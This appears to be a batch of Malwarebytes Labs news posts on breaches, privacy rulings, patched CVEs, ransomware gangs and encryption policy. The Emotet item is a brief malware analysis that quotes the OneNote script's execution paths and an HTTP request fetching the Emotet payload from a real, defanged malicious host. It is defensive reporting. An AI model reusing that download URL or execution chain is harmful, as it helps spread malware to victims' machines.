IT NEWS

Ukrainian game developer GSC Game World has announced it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl. 

A message from GSC Game World team pic.twitter.com/rqRM0tFZmO

— S.T.A.L.K.E.R. OFFICIAL (@stalker_thegame) March 12, 2023

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GCS Game World Team said in its.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some files that they stole before yesterday’s deadline. The group’s VK page is awash with concept art, which includes an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets archived and kept behind a password.

GSC Game World is yet to respond to the demands; and by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded for the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%OneNote16.0NTclick.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%OneNote16.0NTrad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Microsoft, and other vendors, have released their monthly updates. In total Microsoft has fixed a total of 101 vulnerabilities for several titles (including Edge), with two of them being actively exploited zero-days. On top of that, Adobe has fixed an actively exploited vulnerability in ColdFusion.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the actively exploited vulnerabilities patched in these updates are:

CVE-2023-23397: a critical Microsoft Outlook Elevation of Privilege (EoP) vulnerability. External attackers could send specially crafted emails to cause a connection from the victim to an external UNC location of attackers’ control. This would leak the Net-NTLMv2 hash of the victim to the attacker who could then relay this to another service and authenticate as the victim. The mail would be triggered automatically when retrieved and processed by the Outlook client, which could result in exploitation even before the email is viewed in the Preview Pane.

This means this vulnerability could be used to obtain a hashed token, which could then be used in a so-called “pass-the-hash” attack.  Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then returns the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that mathematical operation required to gain access. The authentication process does not require the plaintext password. The hash is enough.

CVE-2023-24880: a moderate Windows SmartScreen Security Feature Bypass vulnerability. An attacker could craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. Reportedly, this vulnerability was used in ransomware related attacks.

MOTW, the technology that ensures Windows pops a warning message when trying to open a file downloaded from the Internet makes another comeback. The MOTW is an attribute added to files by Windows when they have been sourced from an untrusted location, like the internet or a Restricted Zone. When you download a file from the internet, Windows adds the zone identifier or Mark of the Web as an NTFS stream to the file. And, when you run the file, Windows SmartScreen checks if there is a zone identifier Alternate Data Stream (ADS) attached to the file. If the ADS indicates ZoneId=3, which means that the file was downloaded from the internet, the SmartScreen does a reputation check.

CVE-2023-26360: classified as a priority 1 vulnerability in Adobe ColdFusion due to critical deserialization of untrusted data. This flaw can lead to arbitrary code execution, making it a high-priority target for attackers.

Adobe says it is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe recommends updating your ColdFusion versions 2021 and 2018 JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

• ColdFusion 2018 Auto-Lockdown guide
• ColdFusion 2021 Lockdown Guide

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

• Adobe has released security updates to address vulnerabilities in other products. Commerce APSB23-17, Experience Manager APSB23-18, Illustrator APSB23-19, Dimension APSB23-20, Creative Cloud Desktop Application APSB23-21, Substance 3D Stager APSB23-22, and Photoshop APSB23-23.

• Fortinet published its March 2023 security advisories which address a high-severity security vulnerability (CVE-2022-41328) in FortiOS, that allowed threat actors to execute unauthorized code or commands.

• SAP has released security updates for 19 vulnerabilities, five of which were rated as critical.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

After getting in hot water for using an AI chatbot to provide mental health counseling, non-profit startup Koko has now been criticized for experimenting with young adults at risk of harming themselves. Worse, the young adults were unaware they were test subjects. 

Motherboard reports the experiment took place between August and September 2022. At-risk subjects, aged 18 to 25, were directed to a chatbot after posting “crisis-related” keywords like “depression” and “sewer-slide” on Discord, Facebook Messenger, Telegram, and Tumblr. They were then randomly assigned to a group that received a “typical crisis response” (call the crisis hotline), or a “one-minute, enhanced crisis response Single-Session Intervention (SSI)” powered by AI.

Rob Morris, Koko co-founder and Stony Brook University professor, carried out the experiment with his psychology peers, Katherine Cohen, Mallory Dobias, and Jessica Schleider. The study says it aims to show social media platforms that pointing young adults to crisis hotlines isn’t enough. Morris says he wants to show that an AI chatbot intervention is more effective in supporting young adults struggling with mental health issues.

However, this appears to only look good on paper.

Before Koko performs what it was designed to do, it first presents its privacy policy and terms of service (ToS), telling users their anonymous data may be shared and used for research. Here lies the first problem: Consent to take part in the project is given by agreeing to Koko’s privacy policy and ToS. As we all know, a great majority of people online normally don’t read these. Presumably, it’s not the first thought for at-risk young adults either.

When asked about provisions for true consent, Morris tells Motherboard, “There are many situations in which the IRB would exempt researchers from obtaining consent for very good reasons because it could be unethical, or impractical, and this is especially common for internet research. It’s nuanced.” An IRB, or institutional review board, is also called a research ethics committee. Essentially, they’re the group protecting human research subjects.

The second problem involves data. The preprint reveals that subjects provided their age, gender identity, and sexual identity to the researchers. Such datasets may be anonymous, but studies show these can still be traced back to specific individuals with a high accuracy of 99.98 percent. “Most IRBs give a pass to ‘de-identified’ research as they claim there can be no privacy or security harms. But, in this case, they are collecting demographic information which could be used to identify users,” said Eric Perakslis, the chief science and digital officer at the Duke Clinical Research Institute, Motherboard reports.

And the last problem, which alarmed and appalled researchers and psychologists alike, was that the experiment was carried out as “nonhuman subjects research.” This means subjects have been stripped of due safety- and privacy-related protections.

“Completely, horribly unethical. Mucking around in an experimental manner with unproven interventions on potentially suicidal persons is just awful,” New York University bioethics professor Arthur Caplan was quoted as saying.

“If this is the way entrepreneurs think they can establish AI for mental diseases and conditions, they had best plan for a launch filled with backlash, lawsuits, condemnation and criticism. All of which are entirely earned and deserved.”

“I have not in recent years seen a study so callously asleep at the ethical wheel. Dealing with suicidal persons in this way is inexcusable,” he added.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

According to information gathered by BleepingComputer, the Clop ransomware group has claimed responsibility for the ransomware attacks that are tied to a vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution.

As we reported on February 8, Fortra released an emergency patch (7.1.2) for an actively exploited zero-day vulnerability found in the GoAnywhere MFT administrator console.

GoAnywhere MFT, which stands for managed file transfer, allows businesses to manage and exchange files in a secure and compliant way. According to its website, it caters to more than 3,000 organizations, predominantly ones with over 10,000 employees and 1B USD in revenue.

Some of these organizations are considered vital infrastructure such as local governments, financial companies, healthcare organizations, energy firms, and technology manufacturers.

The day after the release of the GoAnywhere patch, the Clop ransomware gang contacted BleepingComputer and said they had used the flaw over ten days to steal data from 130 companies. At the time it was impossible to confirm this claim, but after two earlier victims, Community Health Systems (CHS) and Hatch Bank disclosed that data was stolen in the GoAnywhere MFT attacks, the Clop leak site now shows seven new companies. At least two of them reportedly have been breached using the GoAnywhere MFT vulnerability.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE of the exploited vulnerability is CVE-2023-0669, and described as a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.

It is unknown whether these victims were targeted during the time that there was no patch available for the vulnerability or later. Recent scans showed that around 1,000 administrative consoles are publicly exposed to the internet. The Web Client interface, which is the one that is normally accessible from the public internet, is not susceptible to this exploit, only the administrative interface.

Mitigation

If your GoAnywhere MFT administration portal is exposed to the Internet, you are under urgent advice to download the security patch from the Product Downloads tab at the top of the GoAnywhere account page which you will see after logging in.

If for some reason you can’t install the patch, Fortra says you should follow the mitigation steps it put out, which involves implementing some access control wherein the administrator console interface should only be accessed from trusted sources, or disabling the licensing service altogether. There is also a technical mitigation configuration shared in the advisory that is only visible after logging in (which can be done with a free account if you are interested).

On the file system where GoAnywhere MFT is installed, edit the file [install_dir]/adminroot/WEB_INF/web.xml

 Find and remove (delete or comment out) the following servlet and servlet-mapping configuration in the screenshot below.

 Before:

 <servlet>

      <servlet-name>License Response Servlet</servlet-name>

      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>

      <load-on-startup>0</load-on-startup>

 </servlet>

 <servlet-mapping>

      <servlet-name>Licenses Response Servlet</servlet-name>

      <url-pattern>/lic/accept/</url-pattern>

 

After:

 <!–

 Add these tags to comment out the following section (as shown) or simply delete this section if you are not familiar with XML comments

 <servlet>

      <servlet-name>License Response Servlet</servlet-name>

      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>

      <load-on-startup>0</load-on-startup>

 </servlet>

 <servlet-mapping>

      <servlet-name>Licenses Response Servlet</servlet-name>

      <url-pattern>/lic/accept/</url-pattern>

 </servlet-mapping>

  –>

 

Restart the GoAnywhere MFT application

If GoAnywhere MFT is clustered, this change needs to happen on every instance node in the cluster.

If you have questions, our support team is here to help.  Please contact Support via the portal https://my.goanywhere.com/, email goanywhere.support@helpsystems.com, or phone 402-944-4242 for assistance. “

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Becky Holmes knows how to throw a romance scammer off script—simply bring up cannibalism. 

In January, Holmes shared on Twitter that an account with the name “Thomas Smith” had started up a random chat with her that sounded an awful lot like the beginnins stages of a romance scam. But rather than instantly ignoring and blocking the advances—as Holmes recommends everyone do in these types of situations—she first had a little fun. 

“I was hoping that you’d let me eat a small part of you when we meet,” Holmes said. “No major organs or anything obviously. I’m not weird lol.” 

By just a few messages later, “Thomas Smith” had run off, refusing to respond to Holmes’ follow-up requests about what body part she fancied, along with her preferred seasoning (paprika). 

Romance scams are a serious topic. In 2022, the US Federal Trade Commission reported that, in the five years prior, victims of romance scams had reported losing a collective $1.3 billion. In just 2021, that number was $547 million, and the average amount of money reported stolen per person was $2,400. Worse, romance scammers themselves often target vulnerable people, including seniors, widows, and the recently divorced, and they show no remorse when developing long-lasting online relationships, all bit on lies, so that they can emotionally manipulate their victims into handing over hundreds or thousands of dollars. 

But what would you do if you knew a romance scammer had contacted you and you, like our guest on today’s Lock and Code podcast with host David Ruiz, had simply had enough? If you were Becky Holmes, you’d push back. 

For a couple of years now, Holmes has teased, mocked, strung along, and shut down online romance scammers, much of her work in public view as she shares some of her more exciting stories on Twitter. There’s the romance scammer who she scared by not only accepting an invitation to meet, but ratcheting up the pressure by pretending to pack her bags, buy a ticket to Stockholm, and research venues for a perhaps too-soon wedding. There’s the scammer she scared off by asking to eat part of his body. And, there’s the story of the fake Brad Pitt:

“ My favorite story is Brad Pitt and the the dead tumble dryer repairman. And I honestly have to say, I don’t think I’m ever going to top that. Every time …I put a new tweet up, I think, oh, if only it was Brad Pitt and the dead body. I’m just never gonna get better.”

Tune in today to hear about Holmes’ best stories, her first ever effort to push back, her insight into why she does what she does, and what you can do to spot a romance scam—and how to safely respond to one. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Looking to accelerate your business? Our 2023 State of Malware report will equip you with the cybersecurity strategies you need to protect against the five most dangerous cyberthreats facing businesses this year.

Download and read the report here at www.malwarebytes.com/som. 

And for a live discussion on the most important takeaways from the 2023 State of Malware, join our Threat Down webinar on March 15.

Register here

Last week on Malwarebytes Labs:

• 8 cybersecurity tips to keep you safe when travelling
• National Cybersecurity Strategy Document: What you need to know
• Intel CPU vulnerabilities fixed. But should you update?
• Warning issued over Royal ransomware
• Play ransomware gang leaks City of Oakland data
• DoppelPaymer ransomware group disrupted
• DeepStreamer: Illegal movie streaming platforms hide lucrative ad fraud operation
• Ransomware review: March 2023
• Update Android now! Two critical vulnerabilities patched
• TikTok “a loaded gun” says NSA
• Malware targeting SonicWall devices could survive firmware updates

Stay safe!

Have a question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

The Russia-linked ALPHV ransomware group, also known as BlackCat, has posted sensitive clinical photos of breast cancer patients—calling them “nude photos”—to extort money from the Lehigh Valley Health Network (LVHN).

This has triggered a chorus of accusations from the cybersecurity community, with some labeling the group as “barbarians” and others saying the group is “exploiting and sexualizing breast cancer“.

The leak page for data stolen from the Lehigh Valley Health Network. Apart from the clinical photos, ALPHV also leaked sensitive, personally identifiable information on passports and questionnaires.

“This unconscionable criminal act takes advantage of patients receiving cancer treatment, and LVHN condemns this despicable behavior,” LVHN spokesman Brian Downs said, Lehigh Valley News reported.

LVHN had previously said it fell victim to a BlackCat ransomware attack on February 20. The Network initially detected an intrusion within its IT systems on February 6 and said that initial analysis showed the attack was on a network supporting one physician practice located in Lackawanna County.

The ransom amount has never been made public, but we know that the Network decided not to pay ALPHV anyway. Lehigh’s website has remained offline since the attack.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Write an incident response plan. The period after a ransomware attack can be chaotic. Make a plan that outlines how you’ll isolate an outbreak, communicate with stakeholders, and restore your systems.

Have a question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

WhatsApp will not comply with the UK’s Online Safety Bill when it passes legislation as is. In fact, WhatsApp would rather cease serving UK users, which make up 2% of its global market, than weaken its end-to-end encryption (E2EE).

Will Cathcart, head of WhatsApp at parent company Meta, made these claims in a briefing with the UK press on Thursday, March 9. He reportedly met with legislators to discuss the Bill, which Cathcart described as the most concerning online regulation in the Western world.

“The reality is, our users all around the world want security,” said Cathcart, The Guardian reported.

“Ninety-eight per cent of our users are outside the UK. They do not want us to lower the security of the product, and just as a straightforward matter, it would be an odd choice for us to choose to lower the security of the product in a way that would affect those 98% of users.”

The Bill includes a provision requiring companies to use “accredited technology” to scan messages for anti-terrorism and child protection purposes. It doesn’t say how such scans could be done, yet companies are liable for the content shared on their platforms.

At the moment, organizations cannot scan end-to-end encrypted messages. So, the only way they can comply with the Bill is to make private messages scannable. This means breaking E2EE.

And breaking E2EE in order to scan for terrorism and child sexual abuse images, also means breaking encryption for the crooks too, as it will likely introduce backdoors that create vulnerabilities for attackers and hostile states to exploit. This also precedes state-mandated surveillance on a mass scale, with privacy and security risks affecting entire societies.

“If a country like the UK pushed for that [breaking encryption] on the internet, that would shape what other countries all around the world ask for on different topics on different issues,” Cathcart said, reports Politico.

Client-side scanning (CSS), a technology that can intercept and filter messages before being sent, was seen as an alternative to weakening end-to-end encryption. Still, a study argued it doesn’t guarantee “efficacious crime prevention nor prevents surveillance”. Akin to wiretapping, CSS can give governments access to private content. Its potential for abuse will not be left unnoticed.

WhatsApp refusing to comply would subject it to fines of up to 4% of Meta’s annual turnover. However, this wouldn’t happen if WhatsApp pulls out of the UK market—a possibility that Signal, another popular private messaging app, has already threatened to do.

Wired reports that WhatsApp has reported more CSAM to the National Center for Missing and Exploited Children (NCMEC) than all other tech giants combined. Internet Watch Foundation’s head of policy and public affairs, Michael Tunks disagreed: “There’s a problem with child abuse in end-to-end encrypted environments.”

“The bill does not seek to undermine end-to-end encryption in any way,” he said. “The online safety bill is very clear that scanning is specifically about CSAM and also terrorism. The government has been pretty clear they are not seeking to repurpose this for anything else.”

The Online Safety Bill will be returning to Parliament this summer.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW